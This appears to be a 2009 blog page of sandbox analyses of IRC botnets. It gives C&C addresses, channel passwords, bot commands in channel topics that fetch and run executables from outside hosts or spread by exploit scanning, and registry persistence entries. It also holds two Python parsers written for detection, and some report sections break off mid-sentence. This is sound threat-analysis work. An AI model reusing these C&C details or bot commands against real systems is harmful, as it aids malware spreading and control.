Month: November 2009

85.17.138.130

Remote Host        Port Number
192.168.88.2       80
85.17.138.130      81

IRC traffic:
NICK xx[USA|XP]5722214
PONG :index.html
USER oo oo oo :bb
JOIN #.ooo

Registry Modifications
The following Registry Keys were created:
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_MACROVISIONS
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_MACROVISIONS\0000
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Macrovisions
HKEY_CURRENT_USER\Software\Macrovisions

The newly created Registry Values are:
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_MACROVISIONS\0000]
Service = "Macrovisions"
Legacy = 0x00000001
ConfigFlags = 0x00000000
Class = "LegacyDriver"
ClassGUID = "{8ECC055D-047F-11D1-A537-0000F8753ED1}"
DeviceDesc = "Macrovisions"
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_MACROVISIONS]
NextInstance = 0x00000001
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Macrovisions]
DisplayName = "Macrovisions"
ImagePath = "\??\%Temp%\71863.sys"
Type = 0x00000001
Start = 0x00000003

Type 0x1 with Start 0x3 registers the dropped file as a demand-start kernel driver, and it is loaded from %Temp% rather than from System32\drivers; the LEGACY_MACROVISIONS entry under Enum\Root is what Windows creates for a non-PnP driver service like this.

Memory Modifications
There was a

iik.for5love.ru (big Russian botnet)

Host Name           IP Address
dell-d3e62f7e26     10.1.12.2
iik.for5love.ru     195.190.13.187
ik.whytakebi.com    218.61.22.10
hot.jatajoo.ru      195.190.13.187

Download URLs
http://195.190.13.187/hot.php (iik.for5love.ru), listed three times

* C&C Server: 195.190.13.187:7272
* Server Password:
* Username: SP3-152
* Nickname: [N00_DEU_XP_1314922]_CHAR(0x08)_ä@
* Channel: (Password: )
* Channeltopic:

* C&C Server: 218.61.22.10:7272
* Server Password:
* Username: SP3-686
* Nickname: [00_DEU_XP_1861146]
* Channel: #nit (Password: open)
* Channeltopic: :.asc -S|.http http://rapidshare.com/files/314264722/re|.advscan

trbotnet.sytes.net (IRC botnet)

Host Name            IP Address
dell-d3e62f7e26      10.1.13.2
trbotnet.sytes.net   85.153.30.14

* C&C Server: 85.153.30.14:6667
* Server Password:
* Username: rciahpk
* Nickname: [DEU|XP|772697]
* Channel: #son (Password: botnetim)
* Channeltopic: :.msn seen foto? hxxp://www.travestiniz.co.cc/images.php?id= |.msn.email hxxp://www.travestiniz.co.cc/images.php?id= |.p2p |.yims
* Topic By: [ Load ]

91.207.6.166 (16k botnet)

91.207.6.166:1544
91.207.6.166:3838  channel=##F##

Now talking in ##F##
Topic On: [ ##F## ] [ .asc -S|.http http://rapidshare.com/files/313278869/hus|.advscan exp_sp3 35 3 0 -b -e -r|.advscan exp_sp2 35 3 0 -b -e -r|.advscan exp_sp3 15 3 0 -a -e -r|.advscan exp_sp2 15 3 0 -a -e -r|.r.getfile http://78.159.127.254/del/loader.exe C:\start.exe 1 ]
Topic By: [ ok ]
Modes On: [ ##F## ]

gt10.smo7he.com (mIRC bots hosted in China, Chinanet Jiangsu Province Network, Beijing)

Host Name          IP Address
gt10.smo7he.com    61.147.67.177

Opened listening TCP connection on port: 18631
Opened listening TCP connection on port: 113

* C&C Server: 61.147.67.177:6161
* Server Password:
* Username: laMer
* Nickname: XPMdv4E
* Channel: #kwt-team (Password: #191#)
* Channeltopic:

Hosting info: http://whois.domaintools.com/61.147.67.177

ana.smo7he.net

Host Name          IP Address
ana.smo7he.net     95.128.242.245
dell-d3e62f7e26    10.1.14.2
alkeichah.com      72.35.84.6
u1.k129129.com

UDP Connections
Remote IP Address: 95.128.242.245  Port: 1975
Send Datagram: packet(s) of size 7
Send Datagram: 2 packet(s) of size 3
Send Datagram: packet(s) of size 49
Send Datagram: packet(s) of size 58
Send Datagram: packet(s) of size 1
Recv Datagram: 6329 packet(s) of size 0
Recv Datagram: packet(s) of size 8
Recv Datagram: 2 packet(s)

apolo.c-13.puc.ul

Remote Host      Port Number
66.252.5.47      7000
72.35.84.6       80

* The data identified by the following URL was then requested from the remote web server:
  o http://alkeichah.com/881.exe

IRC traffic:
NICK jcljatvx
JOIN #usb trb50
QUIT gettin new bin.
NICK dpzgprmi
USER dpzgprmi * 0 :COMPUTERNAME
MODE dpzgprmi +ix
USER jcljatvx * 0 :COMPUTERNAME
MODE jcljatvx +ix

Other details
* The following port was open in the system:

mjf.no-ip.in

Remote Host       Port Number
72.184.196.76     6667

IRC traffic:
NICK XP|00|USA|SP2|4653
USER jddgw 0 0 :XP|00|USA|SP2|4653
USERHOST XP|00|USA|SP2|4653
MODE XP|00|USA|SP2|4653 +x+iB
JOIN #ecko
PRIVMSG #ecko :12Password accepted
12Type commandlist
12[PSTORE]: Starting Pstore.
12[PSTORE]: Pstore Started.
PONG :1F6819DC

(The leading "12" on the channel messages is mIRC colour code 12; the control byte in front of it did not survive extraction. The PSTORE lines are the bot reporting to the channel that its Protected Storage grab has started.)

Other details
* The following ports were open in the system:
  Port   Protocol   Process
  113    TCP        msconfig.exe (%System%\msconfig.exe)
  1052   TCP        msconfig.exe (%System%\msconfig.exe)

Registry Modifications
* The following Registry Keys were created:
  o [pathname
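The reports above all expose the same three things over IRC: a machine-generated nick that encodes country, OS and a bot ID, a JOIN with a channel key, and a channel topic that is really a command string split on "|" (.advscan spreading, .http/.r.getfile downloads, .msn/.yims messaging). The following is an added example, not sandbox output or code from any of these bot families: a small parser that pulls those indicators out of raw IRC lines. The sample transcript is constructed from strings quoted on this page; the server name, the 332 (RPL_TOPIC) framing, the OS tags other than XP and the command-family grouping are assumptions of this example.

```python
"""Pull IRC-bot indicators out of raw IRC lines like those quoted on this page.
Added example, not sandbox output or bot code. SAMPLE_IRC is constructed from the
NICK/JOIN/topic strings in the reports above; the server prefix, the 332 (RPL_TOPIC)
framing and the line order are assumed."""
import re
from collections import Counter
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Token shapes seen in nicks on this page: [DEU|XP|772697], XP|00|USA|SP2|4653, xx[USA|XP]5722214
COUNTRY_RE = re.compile(r"^[A-Z]{3}$")
OS_RE = re.compile(r"^(XP|2K|2K3|NT|VISTA|W7|98|ME)$")   # OS tags other than XP are assumed
SP_RE = re.compile(r"^SP\d$")
ID_RE = re.compile(r"^\d{3,}$")
URL_RE = re.compile(r"h(?:tt|xx)ps?://[^\s|\]]+")        # also keeps defanged hxxp:// URLs
# Heuristic grouping of the topic commands seen on this page (this example's, not a bot spec)
CMD_FAMILY = {"advscan": "spread", "asc": "spread", "http": "download", "r.getfile": "download",
              "msn": "im-spam", "msn.email": "im-spam", "yims": "im-spam"}

@dataclass
class BotCommand:
    channel: str
    name: str
    args: List[str]
    flags: List[str]
    urls: List[str]
    family: str

def parse_bot_nick(nick: str) -> Dict[str, str]:
    """Split a generated nick into country/os/sp/id fields; a random nick yields {}."""
    fields: Dict[str, str] = {}
    for tok in re.split(r"[\[\]|_]", nick):
        for key, pat in (("country", COUNTRY_RE), ("os", OS_RE), ("sp", SP_RE), ("id", ID_RE)):
            if key not in fields and pat.match(tok):
                fields[key] = tok
                break
    return fields

def looks_like_bot_nick(nick: str) -> bool:
    """Two of country/os/id present is enough to call the nick machine-generated."""
    return len({"country", "os", "id"} & set(parse_bot_nick(nick))) >= 2

def parse_topic(channel: str, topic: str) -> List[BotCommand]:
    """Split ':[ .asc -S|.http URL|.advscan exp_sp3 35 3 0 -b -e -r ]' into one command per '|'."""
    body = topic.lstrip(":").strip()
    if body.startswith("[") and body.endswith("]"):
        body = body[1:-1]
    cmds = []
    for part in body.split("|"):
        toks = part.split()
        if not toks or not toks[0].startswith("."):
            continue
        name, rest = toks[0][1:], toks[1:]
        cmds.append(BotCommand(channel, name, [t for t in rest if not t.startswith("-")],
                               [t for t in rest if t.startswith("-")], URL_RE.findall(part),
                               CMD_FAMILY.get(name, "unknown")))
    return cmds

def parse_irc_line(line: str) -> Tuple[str, List[str]]:
    """Minimal RFC 1459 split into (COMMAND, params); the trailing ':param' may contain spaces."""
    if line.startswith(":"):                 # drop the server/user prefix
        line = line.partition(" ")[2]
    head, sep, trailing = line.partition(" :")
    params = head.split() + ([trailing] if sep else [])
    return (params[0].upper(), params[1:]) if params else ("", [])

def extract_iocs(lines: List[str]) -> Dict[str, object]:
    """Collect joined channels (with keys), generated nicks, topic commands and URLs."""
    channels: Dict[str, Optional[str]] = {}
    nicks, commands = set(), []
    for raw in lines:
        cmd, params = parse_irc_line(raw)
        if cmd == "NICK" and params and looks_like_bot_nick(params[0]):
            nicks.add(params[0])
        elif cmd == "JOIN" and params:
            channels[params[0]] = params[1] if len(params) > 1 else None   # second param is the key
        elif cmd in ("332", "TOPIC") and len(params) >= 2:                # topic on join / live change
            commands.extend(parse_topic(params[-2], params[-1]))
    return {"channels": channels, "bot_nicks": nicks, "commands": commands,
            "urls": {u for c in commands for u in c.urls}}

def family_counts(report: Dict[str, object]) -> Dict[str, int]:
    return dict(Counter(c.family for c in report["commands"]))

SAMPLE_IRC = [  # constructed; strings come from this page, framing is assumed
    "NICK [DEU|XP|772697]",
    "USER rciahpk 0 0 :[DEU|XP|772697]",
    "JOIN #son botnetim",
    ":irc.example.net 332 [DEU|XP|772697] #son :.msn seen foto? hxxp://www.travestiniz.co.cc/images.php?id= "
    "|.msn.email hxxp://www.travestiniz.co.cc/images.php?id= |.p2p |.yims",
    "NICK XP|00|USA|SP2|4653",
    "JOIN #ecko",
    "NICK jcljatvx",  # random nick: must not be flagged
    "JOIN #usb trb50",
    "NICK xx[USA|XP]5722214",
    ":irc.example.net 332 xx[USA|XP]5722214 ##F## :[ .asc -S|.http http://rapidshare.com/files/313278869/hus"
    "|.advscan exp_sp3 35 3 0 -b -e -r|.advscan exp_sp2 35 3 0 -b -e -r|.advscan exp_sp3 15 3 0 -a -e -r"
    "|.advscan exp_sp2 15 3 0 -a -e -r|.r.getfile http://78.159.127.254/del/loader.exe C:\\start.exe 1 ]",
]
```

Calling `extract_iocs(SAMPLE_IRC)` returns the three generated nicks (jcljatvx is not flagged), the channels with their keys, eleven parsed commands and the three download/lure URLs; `family_counts` then shows five spreading commands, two downloads and three IM-spam commands. The same functions work on a pcap's IRC payloads once they are split into lines, which is the realistic input: these bots sit on non-standard ports (7272, 3838, 6161, 8800 above), so matching on port 6667 alone misses most of them.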

xdetras.dyndns.info

Host Name             IP Address
dell-d3e62f7e26       10.1.2.2
xdetras.dyndns.info   109.123.66.112

* C&C Server: 109.123.66.112:6667
* Server Password:
* Username: XP-5750
* Nickname: [DEU|00|P|03462]
* Channel: #nuevos# (Password: mariano)
* Channeltopic: :

Registry Changes by all processes
Create or Open Changes:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run "winlogin" = winlogin.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\Run "winlogin" = winlogin.exe
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List "c:\1.exe" = c:\1.exe:*:Enabled:winlogin
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg "LogSessionName" = [REG_EXPAND_SZ, value: stdout]
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg "Active"

The AuthorizedApplications\List value whitelists c:\1.exe in the XP firewall (the ":*:Enabled:" part means all scopes, enabled, display name "winlogin"), and the same winlogin value also lands in the Terminal Server\Install shadow of the Run key, so a sweep of HKLM Run alone misses one copy.

bnetnew.helohmar.com

Host Name              IP Address
bnetnew.helohmar.com   98.126.18.10

Outgoing connection to remote server: bnetnew.helohmar.com TCP port 8800

SMTP connections:
* SMTP: 65.55.37.88:25
* SMTP: 74.6.136.65:25 (Username / Password: none given)
* SMTP: 65.55.92.152:25
* SMTP: 65.55.37.104:25
* SMTP: 65.54.188.72:25
* SMTP: 65.55.92.152:25
* SMTP: 65.54.188.110:25
* SMTP: 209.191.88.254:25 (Username / Password: none given)

Direct connections to many mail servers on port 25 with no credentials point at spam output rather than a mail client.

Registry Changes by all processes
Create or Open Changes:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon "Taskman" = C:\RECYCLER\S-1-5-21-0243556031-888888379-781863308-1455\mmdg.exe
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon "Shell" = explorer.exe,C:\RECYCLER\S-1-5-21-0243556031-888888379-781863308-1455\mmdg.exe
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run "Tjmm71" = C:\RECYCLER\S-1-5-21-0243556031-888888379-781863308-1455\mmdg.exe
Reads:
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon

Three persistence points for one binary: the Shell value keeps explorer.exe first so the desktop still loads with mmdg.exe chained behind it, Taskman replaces the program Winlogon runs as the task manager, and the Run value is the usual autostart. The RECYCLER\<SID> directory is the Recycle Bin's storage and is hidden from Explorer by default, which is why it is a favourite drop location.
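The registry changes quoted in the xdetras.dyndns.info and bnetnew.helohmar.com reports (and the driver service in the 85.17.138.130 report) are the part of these sandbox dumps worth automating: a handful of keys give code a way to run at logon or boot, and the path the value points at tells you whether it is a normal installer or a bot. The following is an added example, not sandbox or bot code, that triages such lines. The sample re-types the page's entries in one `KEY "Name" = value` shape with backslashes restored and adds two benign lines as noise; the rule labels and the decision to weigh binary location only on already-flagged keys are choices of this example.

```python
"""Triage the 'Registry Changes' lines a sandbox prints, as in the reports on this page.
Added example, not sandbox or bot code. SAMPLE_CHANGES re-types entries quoted in the
xdetras.dyndns.info, bnetnew.helohmar.com and 85.17.138.130 reports above in one
'KEY "Name" = value' shape, with backslashes restored; the last two lines are benign noise."""
import re
from typing import Dict, List, Optional, Tuple

LINE_RE = re.compile(r'^(?P<key>\S.*?)\s+"(?P<name>[^"]+)"\s*=\s*(?P<value>.*)$')
# Registry locations that give code a way to run at logon/boot or to evade the host firewall.
KEY_RULES = [  # (key path pattern, required value name or None, finding)
    (re.compile(r"\\CurrentVersion\\Run$", re.I), None, "autorun via Run key"),
    (re.compile(r"\\Winlogon$", re.I), "Shell", "Winlogon Shell hijack"),
    (re.compile(r"\\Winlogon$", re.I), "Taskman", "Winlogon Taskman hijack"),
    (re.compile(r"\\FirewallPolicy\\.*\\AuthorizedApplications\\List$", re.I), None,
     "Windows Firewall exception added"),
    (re.compile(r"\\Services\\[^\\]+$", re.I), "ImagePath", "service/driver image registered"),
]
# Where the referenced binary lives matters as much as the key it is written to.
PATH_RULES = [
    (re.compile(r"%temp%|\\temp\\", re.I), "binary in a temp directory"),
    (re.compile(r"\\RECYCLER\\", re.I), "binary hidden under RECYCLER"),
]
BINARY_RE = re.compile(r'(?:[A-Za-z]:|%\w+%)?\\?[^,:;*\s"]*\.(?:exe|sys|dll)', re.I)

def parse_change(line: str) -> Optional[Tuple[str, str, str]]:
    """'HKLM\\...\\Run "winlogin" = winlogin.exe' -> (key, value name, data); None if not that shape."""
    m = LINE_RE.match(line.strip())
    return (m["key"], m["name"], m["value"].strip()) if m else None

def assess(line: str) -> List[str]:
    """Findings for one change line; [] means nothing persistence-related."""
    parsed = parse_change(line)
    if parsed is None:
        return []
    key, name, value = parsed
    hits = []
    for key_re, want_name, label in KEY_RULES:
        if key_re.search(key) and (want_name is None or want_name.lower() == name.lower()):
            if want_name == "Shell" and value.lower() == "explorer.exe":
                continue                          # default shell with nothing chained behind it
            hits.append(label)
    if hits:                                      # location only matters for a key we already flagged
        hits += [label for val_re, label in PATH_RULES if val_re.search(value)]
    return hits

def triage(lines: List[str]) -> Dict[str, List[str]]:
    """Keep only the change lines that tripped a rule, mapped to their findings."""
    out: Dict[str, List[str]] = {}
    for ln in lines:
        hits = assess(ln)
        if hits:
            out[ln] = hits
    return out

def persistence_binaries(lines: List[str]) -> set:
    """Distinct executables/drivers the flagged changes point at (explorer.exe excluded as the real shell)."""
    found = set()
    for ln in triage(lines):
        _, _, value = parse_change(ln)
        found.update(p for p in BINARY_RE.findall(value) if p.lower() != "explorer.exe")
    return found

SAMPLE_CHANGES = [  # constructed from this page's reports; the last two lines are benign noise
    r'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run "winlogin" = winlogin.exe',
    r'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\Run "winlogin" = winlogin.exe',
    r'HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List "c:\1.exe" = c:\1.exe:*:Enabled:winlogin',
    r'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon "Taskman" = C:\RECYCLER\S-1-5-21-0243556031-888888379-781863308-1455\mmdg.exe',
    r'HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon "Shell" = explorer.exe,C:\RECYCLER\S-1-5-21-0243556031-888888379-781863308-1455\mmdg.exe',
    r'HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run "Tjmm71" = C:\RECYCLER\S-1-5-21-0243556031-888888379-781863308-1455\mmdg.exe',
    r'HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Macrovisions "ImagePath" = \??\%Temp%\71863.sys',
    r'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg "LogSessionName" = [REG_EXPAND_SZ, value: stdout]',
    r'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon "Shell" = explorer.exe',
]
```

`triage(SAMPLE_CHANGES)` flags seven of the nine lines: the tracing key and a Shell value that is plain explorer.exe drop out, the Shell value with a second path chained behind explorer.exe does not. `persistence_binaries` collapses those seven hits to four files to pull from the image: winlogin.exe, c:\1.exe, the mmdg.exe under RECYCLER and the %Temp% driver. The Run rule deliberately matches on the tail of the key path so the Terminal Server\Install shadow copy is caught along with HKLM and HKCU Run.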